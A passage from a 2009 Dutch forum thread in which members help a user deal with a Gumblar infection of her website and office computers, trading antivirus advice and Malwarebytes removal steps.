    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:42:21 #53
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786682
    Ik ben benieuwd wat avast wel of niet vindt iig
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71786717
    Volgens mij tot nu toe nog niks
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 12:46:15 #55
    79166 Qwea
    #teampindakaas #viesdik
    pi_71786777
    quote:
    Op dinsdag 11 augustus 2009 12:43 schreef MissBliss het volgende:
    Volgens mij tot nu toe nog niks
    Hij hoeft ook niet perse op jouw pc te staan Hij kan ook op die van RE staan... want toegang tot netwerk.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 12:46:41 #56
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71786785
    quote:
    Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
    Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
    Handig om daar op te klikken..

    Overigens heb ik ervaren dat Malwarebytes Anti-Malware (vrij klein en gratis) erg goed werkt tegen deze hardnekkige dingen. Maar goed dit is ook nieuw voor me. Gelukkig zit ik nu op m'n Apple'tje werken..

    [ Bericht 3% gewijzigd door Mr.Noodle op 11-08-2009 12:55:34 ]
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 12:47:54 #57
    262 Re
    Kiss & Swallow
    pi_71786806
    homepage is iig veranderd naar goolge

    ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')
    04-08-11, 02-02-12, 20-06-14, 13-08-15
    pi_71786854
    quote:
    Op dinsdag 11 augustus 2009 @ 12:46 schreef Qwea het volgende:

    [..]

    Hij hoeft ook niet perse op jouw pc te staan Hij kan ook op die van RE staan... want toegang tot netwerk.
    Oh
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71787174
    quote:
    Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:

    [..]

    Het is mn eigen computer ja. Ik durf dit niet

    Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.

    Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
    Ok.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
    pi_71787191
    Probeer dit dan maar.

    Updaten en scannen met Malwarebytes' Anti-Malware
  • Start MalwareBytes AntiMalware (Vista gebruikers > rechtermuisknop kies uitvoeren als Admin).
  • Draai Malwarebytes' Anti-Malware niet in safemode, dan anders aangegeven.


    Update Malwarebytes' Anti-Malware
  • Selecteer de "Update" tab.
  • Klik op "Controleer Updates".
  • Wanner het updaten klaar is, selecteer de "Scanner" tab.
  • Klik "Volledige Scan".
  • Wanneer het scannen voltooid is, klik op "OK", en ga naar de resultaten lijst.
  • Bij de resultatenlijst, selecteer alles en klik op "Verwijderen".
  • Na een succesvolle scan, een log zal automatisch worden geopend in Notepad. Kopieer en plak deze log en zet het in je volgende reply.
  • Klik je de log om de één of andere reden weg, dan kun je hem hier weer vinden:
  • C:\Documents and Settings\[gebuikersnaam]\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs
  • █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:03:44 #61
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787197
    quote:
    Op dinsdag 11 augustus 2009 12:47 schreef Re het volgende:
    homepage is iig veranderd naar goolge

    ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')
    ! En die helpdesk is nog steeds niet langs geweest?

    Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:04:32 #62
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787215
    quote:
    Op dinsdag 11 augustus 2009 12:49 schreef MissBliss het volgende:

    [..]

    Oh
    Das het mooie van een netwerk. Stel je heb 500 comps in dat netwerk, en 1 van die 500 is besmet, dan kan dat virus bij alles van het netwerk. Dus ook bij de ftp gegevens.

    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787289
    quote:
    Op dinsdag 11 augustus 2009 @ 13:03 schreef CantFazeMe het volgende:
    Probeer dit dan maar.

    Updaten en scannen met Malwarebytes' Anti-Malware
  • Start MalwareBytes AntiMalware (Vista gebruikers > rechtermuisknop kies uitvoeren als Admin).
  • Draai Malwarebytes' Anti-Malware niet in safemode, dan anders aangegeven.


    Update Malwarebytes' Anti-Malware
  • Selecteer de "Update" tab.
  • Klik op "Controleer Updates".
  • Wanner het updaten klaar is, selecteer de "Scanner" tab.
  • Klik "Volledige Scan".
  • Wanneer het scannen voltooid is, klik op "OK", en ga naar de resultaten lijst.
  • Bij de resultatenlijst, selecteer alles en klik op "Verwijderen".
  • Na een succesvolle scan, een log zal automatisch worden geopend in Notepad. Kopieer en plak deze log en zet het in je volgende reply.
  • Klik je de log om de één of andere reden weg, dan kun je hem hier weer vinden:
  • C:\Documents and Settings\[gebuikersnaam]\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs
  • Ga ik doen zodra avast klaar is
    81% nu.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 13:09:23 #64
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71787333
    Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt.

    aVast doet hier trouwens niet veel tegen..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:11:33 #65
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787394
    quote:
    Op dinsdag 11 augustus 2009 13:09 schreef Mr.Noodle het volgende:
    Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt.

    aVast doet hier trouwens niet veel tegen..
    Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787408
    Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.)

    Maar het is een zeer goed programma.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:13:56 #67
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787455
    quote:
    Op dinsdag 11 augustus 2009 13:11 schreef CantFazeMe het volgende:
    Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.)

    Maar het is een zeer goed programma.
    Die is toch ook actief
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787490
    quote:
    Op dinsdag 11 augustus 2009 13:13 schreef Qwea het volgende:

    [..]

    Die is toch ook actief
    Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:17:14 #69
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787538
    quote:
    Op dinsdag 11 augustus 2009 13:15 schreef CantFazeMe het volgende:

    [..]

    Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.
    Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.

    Voor gewone bescherming draait ze op dr eigen pc avast.

    Wat draai je eigenlijk op die andere machines MB?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787556
    Avast is klaar, niks gevonden
    (Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.

    Nu ga ik dat malwarebytes eens proberen.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71787582
    quote:
    Op dinsdag 11 augustus 2009 @ 13:17 schreef Qwea het volgende:

    [..]

    Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.

    Voor gewone bescherming draait ze op dr eigen pc avast.

    Wat draai je eigenlijk op die andere machines MB?
    De minilaptop heeft AVG (heet dat zo?) en die van Re weet ik niet. Minilaptop heb ik nog niet aangehad, nog geen zin in
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:19:16 #72
    105263 Litso
    Interlectueel.
    pi_71787592
    quote:
    Op dinsdag 11 augustus 2009 12:35 schreef Qwea het volgende:

    [..]

    Download ff avast. Ik snap het niet he...

    Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan terwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!"
    Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht
    "Dat is echt ontzettend zielig" ©
      Redactie Games dinsdag 11 augustus 2009 @ 13:19:39 #73
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71787604
    quote:
    Op dinsdag 11 augustus 2009 13:11 schreef Qwea het volgende:

    [..]

    Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.
    aVast doet dan half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:19:55 #74
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787608
    quote:
    Op dinsdag 11 augustus 2009 13:17 schreef MissBliss het volgende:
    Avast is klaar, niks gevonden
    (Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.

    Nu ga ik dat malwarebytes eens proberen.
    verwijder ze in veilige modus? Hier ook wel eens gehad... en dan doettie het wel.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:20:52 #75
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787648
    quote:
    Op dinsdag 11 augustus 2009 13:19 schreef Mr.Noodle het volgende:

    [..]

    aVast doet half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.
    aah oke. Kijk, das nieuw voor moi. Maar je kan de backup toch handmatig verwijderen?

    Trouwens MB, die malware bytes, voer die idd even op je gehele netwerk uit en niet enkel op je eigen pc.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787670
    quote:
    Op dinsdag 11 augustus 2009 13:17 schreef Qwea het volgende:

    [..]

    Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.

    Voor gewone bescherming draait ze op dr eigen pc avast.

    Wat draai je eigenlijk op die andere machines MB?


    Dat bedoel ik dus. (lets go back ontopic.)
    █▄ █▄█ █▄ █▄█▄█ █▄█ ▀█▀
    TryAndResistClicking. Trollspray.
      dinsdag 11 augustus 2009 @ 13:22:08 #77
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787697
    quote:
    Op dinsdag 11 augustus 2009 13:19 schreef Litso het volgende:

    [..]

    Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht
    Avast zou ik sowieso als virusscanner gebruiken, maar aangezien die bij MB niks vindt, probeer ook ff die malware bytess

    Avast is tot nu toe de enige die ik heb meegemaakt die je weghaald bij de bad iframes. De rest geeft geen kick
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:22:37 #78
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787711
    quote:
    Op dinsdag 11 augustus 2009 13:21 schreef CantFazeMe het volgende:

    [..]



    Dat bedoel ik dus. (lets go back ontopic.)
    Dat weet ik wel je zei het alleen zo moeilijk
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71787741
    Even opnieuw opstarten, de J schijf is verdwenen

    Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:25:50 #80
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787818
    quote:
    Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
    Even opnieuw opstarten, de J schijf is verdwenen

    Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
    Ik persoonlijk zou het heel omslachting doen (thats my middle name ) en die malware bytes op een schijfje zetten en individueel op alle pc's draaien .
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:26:49 #81
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787851
    aah, er is druk iemad bezig met je site weer ok te maken zie ik
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 13:26:55 #82
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71787853
    quote:
    Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
    Even opnieuw opstarten, de J schijf is verdwenen

    Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
    Netwerk scannen heeft niet echt veel zin als andere PC's ook Windows draaien. Trojans/virussen/malware nestelen zich 99% op de schijf waar Windows op geïnstalleerd is, meestal is dat door andere gebruikers niet toegankelijk via het netwerk. Tenzij de Admin erbij kan komen...

    Rest alleen dat er op elke computer dat progje geïnstalleerd moet worden. Maar goed, kijk eerst even of het bij jezelf werkt voordat je aan de rest begint..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:27:01 #83
    22273 Dizer
    Save the beard!
    pi_71787857
    quote:
    Op dinsdag 11 augustus 2009 12:30 schreef Qwea het volgende:

    [..]


    [..]

    Flash en adobe reader.
    [..]


    [..]

    Ik vraag me af waarom vista niet.

    overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten

    Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
    Ok maar begrijp ik hieruit dat:

    Je besmet bent.
    Je de virus weghaald.
    Je website vernieuwd
    Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?


    Wat is het leven toch heerlijk met een Mac .
    Friends don't let friends remain beardless...
      dinsdag 11 augustus 2009 @ 13:31:10 #84
    79166 Qwea
    #teampindakaas #viesdik
    pi_71787968
    quote:
    Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:

    [..]

    Ok maar begrijp ik hieruit dat:

    Je besmet bent.
    Je de virus weghaald.
    Je website vernieuwd
    Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?


    Wat is het leven toch heerlijk met een Mac .
    Ja. Als je het virus weghaalt, en je hebt een scanner die niet de bad iframes detecteerd (norton deed dat dus mooi niet gisteren) dan raak je opnieuw infected als je bv pietjepuk.nl bezoekt en die is besmet. Avast die ik heb, geef complete alarm bellen en dan heb je de keuze tussen doorgaan (en dus besmet worden) of de connectie afbreken zodat het iframe niet geladen wordt
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:34:22 #85
    262 Re
    Kiss & Swallow
    pi_71788071
    quote:
    Op dinsdag 11 augustus 2009 13:03 schreef Qwea het volgende:

    [..]

    ! En die helpdesk is nog steeds niet langs geweest?

    Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?
    mja, netwerk is hier wel redelijk goed beveiligd, hangen 25.000 computers aan ofzo, laptop ligt nu bij IT
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 13:35:18 #86
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788091


    Dat geeft avast dus aan... als er een bad iframe is
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 13:35:45 #87
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788106
    Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:36:52 #88
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788137
    quote:
    Op dinsdag 11 augustus 2009 13:35 schreef Mr.Noodle het volgende:
    Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo.
    Maar je wilt niet weten hoeveel mensen die zooi nog gebruiken. Nieuwe comps worden grotendeels met mcafee geleverd.

    Donderdag nieuwe laptop gehaald ; mcafee zat erop

    Gelijk er maar afgelikkerd.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      FOK!-Schrikkelbaas dinsdag 11 augustus 2009 @ 13:37:18 #89
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71788154
    Maar die moet dan toch gebruik maken van een enorm gat in je browser?
      dinsdag 11 augustus 2009 @ 13:38:04 #90
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788182
    quote:
    Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
    Maar die moet dan toch gebruik maken van een enorm gat in je browser?
    Nee, in adobe dus. Want via adobe komt het binnen.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 13:38:37 #91
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788205
    quote:
    Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:

    [..]

    Wat is het leven toch heerlijk met een Mac .
    Ja, het scheelt je iig (tot nu toe) dit soort frustraties..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      Redactie Games dinsdag 11 augustus 2009 @ 13:39:19 #92
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788232
    quote:
    Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
    Maar die moet dan toch gebruik maken van een enorm gat in je browser?
    Via de Adobe plugins waarvan je browser gebruik maken..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:40:35 #93
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788278
    quote:
    Op dinsdag 11 augustus 2009 13:39 schreef Mr.Noodle het volgende:

    [..]

    Via de Adobe plugins waarvan je browser gebruik maken..
    Dat dus idd

    Nou snap ik nog steeds niet waarom vista er niet bij staat. Als infected platforms
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71788311
    quote:
    Op dinsdag 11 augustus 2009 @ 13:25 schreef Qwea het volgende:

    [..]

    Ik persoonlijk zou het heel omslachting doen (thats my middle name ) en die malware bytes op een schijfje zetten en individueel op alle pc's draaien .
    Ok
    Ja goed idee wel

    Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
    quote:
    Op dinsdag 11 augustus 2009 @ 13:26 schreef Qwea het volgende:
    aah, er is druk iemad bezig met je site weer ok te maken zie ik
    Ja?
    Ik durf er niet meer te kijken
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 13:42:11 #95
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71788324
    Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren is omdat mensen niet normaal aan het werk kunnen..

    sorry..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 13:42:52 #96
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788341
    quote:
    Nieuwe kampioen

    Volgens ScanSafe is Gumblar erger dan Conficker, een worm die zich verspreidt via een gat in Windows, om vervolgens namaak antivirussoftware te installeren en de echte uit te schakelen. Gumblar was de eerste twee weken van deze maand goed voor veertig procent van de malware die werd geblokkeerd door ScanSafe.

    De worm gedraagt zich anders dan Conficker, hij dringt dieper binnen en onderschept en monitort het webverkeer. Daarnaast wordt er een Trojaans paard geïnstalleerd dat data zoals wachtwoorden en gebruikersnamen steelt, aldus Cnet.
    Nou is het duidelijk dat het ftp gegevens steelt... maar in het stukje hier boven staat " wachtwoorden en gebruikers namen" dus dat geldt ook voor e-mail e.d?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 13:43:24 #97
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788360
    quote:
    Op dinsdag 11 augustus 2009 13:41 schreef MissBliss het volgende:

    [..]

    Ok
    Ja goed idee wel

    Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
    [..]

    Ja?
    Ik durf er niet meer te kijken
    Ja je site is fucked up, dus ik neem aan dat iemand ermee bezig is
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71788396
    quote:
    Op dinsdag 11 augustus 2009 @ 13:42 schreef Mr.Noodle het volgende:
    Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..

    sorry..
    Ik vind het ook zeer hilarisch.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71788408
    quote:
    Op dinsdag 11 augustus 2009 @ 13:43 schreef Qwea het volgende:

    [..]

    Ja je site is fucked up, dus ik neem aan dat iemand ermee bezig is
    Oh dat, ja ik weet niet wat dat is, volgens mij gewoon het virus?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 13:45:41 #100
    79166 Qwea
    #teampindakaas #viesdik
    pi_71788430
    quote:
    Op dinsdag 11 augustus 2009 13:42 schreef Mr.Noodle het volgende:
    Stiekem ben ik toch wel weer benieuwd naar de uitkomst van dit topic, meer als in hoeveel tijd men eraan kwijt is, hoeveel frustratie het oproept en hoeveel geld er verloren omdat mensen niet normaal aan het werk kunnen..

    sorry..
    Nou, erg veel tijd. Het bedrijf waar mijn vriend werkt heeft het dus ook. En die hebben dus echt veel ftp gegevens van klanten e.d. En ik geloof dat de halve afdeling nu met dat virus bezig is

    Ik vind het werkelijk een KUT vrius
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    abonnement Unibet Coolblue Bitvavo
    Forum Opties
    Forumhop:
    Hop naar:
    (afkorting, bv 'KLB')